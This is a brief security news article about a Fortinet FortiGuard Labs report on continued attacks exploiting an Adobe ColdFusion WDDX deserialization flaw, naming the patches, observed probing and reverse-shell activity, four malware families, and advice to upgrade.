Fortinet Uncovers Ongoing Threat Exploitation Targeting Adobe ColdFusion
Fortinet recently reported a concerning trend of threat exploitation targeting Adobe ColdFusion, a popular web development computing platform. Despite Adobe releasing a series of security updates (APSB23-40, APSB23-41, and APSB23-47) in July to address critical vulnerabilities, Fortinet’s FortiGuard Labs IPS telemetry data has continued to detect numerous attempts to exploit one specific vulnerability related to the deserialization of untrusted data by WDDX data within ColdFusion requests.
The Risk of Arbitrary Code Execution
This vulnerability is particularly critical as it opens the door to arbitrary code execution, allowing attackers to take control of a system remotely. The observed attacks have included probing activities using tools like interactsh to test exploit success and the establishment of reverse shells to gain unauthorized access to target systems.
Identified Malware Variants
FortiGuard Labs identified four malware variants being used in these attacks:
- XMRig Miner: Utilizes system resources to mine for Monero cryptocurrency
- Satan DDoS/Lucifer: A hybrid bot that combines cryptojacking and DDoS capabilities
- RudeMiner/SpreadMiner: Similar to Lucifer, with malicious mining functionalities
- BillGates/Setag: A backdoor that hijacks systems, communicates with command and control servers, and initiates attacks
Urgent Call to Action
Despite the availability of patches for these vulnerabilities, public attacks are still being carried out. FortiGuard Labs strongly advises users to promptly upgrade affected systems and apply FortiGuard protection to prevent threat probing and potential exploitation.
For more information and guidance on securing Adobe ColdFusion and defending against these ongoing threats, visit Fortinet’s official website.